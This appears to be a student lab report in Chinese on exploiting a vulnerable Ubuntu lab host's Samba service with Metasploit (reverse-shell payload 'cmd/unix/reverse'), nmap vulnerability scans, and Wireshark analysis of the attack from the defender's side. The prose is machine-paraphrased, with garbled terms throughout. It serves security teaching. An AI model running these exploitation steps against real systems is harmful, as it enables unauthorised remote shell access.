目录
一.知识点梳理与总结
1.目前,Linux已然成为服务器操作系统最流行的选择,虽然Linux在安全设计上较Windows等一些操作系统具有一定的先天优势linux操作系统培训,但它也决不是原先一些人所觉得的“绝对安全”。Linux操作系统也存在着大量的安全漏洞,因为它的开源特点,黑客们反倒更容易从源码中发觉更多的Linux系统内核及开源软件中的漏洞,系统管理员对Linux服务器的忙于管理也促使近些年来针对Linux系统的安全风波多有发生。
本次实践针对Linux系统存在漏洞进行远程渗透功击,使用的工具为Metasploit,据悉在进行攻守对抗过程中,还使用到了Nmap、Neusse等信息收集工具。
2.SMB(ServerMessageBlock)合同是实现不同类型计算机之间文件和复印机共享服务的合同。
SMB的工作原理就是让NetBIOS合同与SMB合同运行在TCP/IP合同之上,而且借助NetBIOS的名子解析功能让Linux计算机可以在Windows计算机之间互相访问共享文件和复印机的功能。
3.Samba是一组使linux支持SMB合同的软件,基于GPL原则发行linux内核中网络协议的设计与实现,源码完全公开。Samba的核心是两个守护进程smbd和nmbd.smbd守护进程负责构建对话linux内核中网络协议的设计与实现,验证用户提供文件和复印机共享服务等。nmbd守护进程负责实现网路浏览。
1.SMB合同2.Samba二.实验过程1.使用Metasploit进行Linux远程渗透功击
本次实验使用的功击机为Kali,IP地址为192.168.200.8;机炮为MetasploitUbuntu,IP地址为192.168.200.124:
首先在Kali上打开Metasploit:
查找要使用的漏洞对应的模块
searchsamba
对应编号是13,为此,use13即可使用该模块。
查看可用荷载showpayloads
选择功击荷载setpayloadcmd/unix/reverse
查看须要配置的参数showoptions
配置相应的参数
setRHOST192.168.200.124,setLHOST192.168.200.8
只需配置机炮IP即可
设置完成后,输入exploit进行功击
可以看见早已功击成功
2.攻守对抗实践
二人联接到同一个局域网中,功击机kali和火箭炮metasploit的IP地址分别为192.168.200.8和192.168.200.124
测试下它们的连通性
ping192.168.200.124
ping通以后
使用nmap-sV192.168.200.124扫描目标主机的开放端口与版本号等信息:
使用nmap--scriptvuln192.168.200.124扫描目标主机存在的漏洞:
功击采用的渗透模块依然是第一个实验中使用的模块,输入searchsamba
use13
此次选择第五个payloads
可以看见功击成功
逼抢方窃听:对第二次的功击进行逼抢
借助wireshark对网卡进行窃听,从中可以剖析得到,功击者IP为192.168.200.8,功击者借助的是139端口进行功击,在功击成功后进行了ifconfig等操作
三.学习中遇见的问题
问题1.在看wireshark数据包时,不晓得如何剖析出功击者是借助那个端口(服务)的漏洞进行功击的
解决:经过寻问朋友linux系统,得知从抓取数据包找最前面一个包的端口信息,对端口的理解也更深
四.学习体会
在实验中会碰到一些不理解的步骤,解决后会认为受益颇丰。从之前理解不是很到位的端口和网关,每一次亲自试错解决就会觉得收获很大。
通过本次使用Metasploit进行Linux远程渗透功击,首先进一步熟悉了Metasploit工具的使用,其次通过攻守对抗过程,动手进行了从漏洞信息收集、漏洞借助、渗透功击到获取目标主机权限的过程,提升了自己的实践能力。
本文原创地址:https://www.linuxprobe.com/kyyylxtnhjky.html编辑:刘遄,审核员:暂无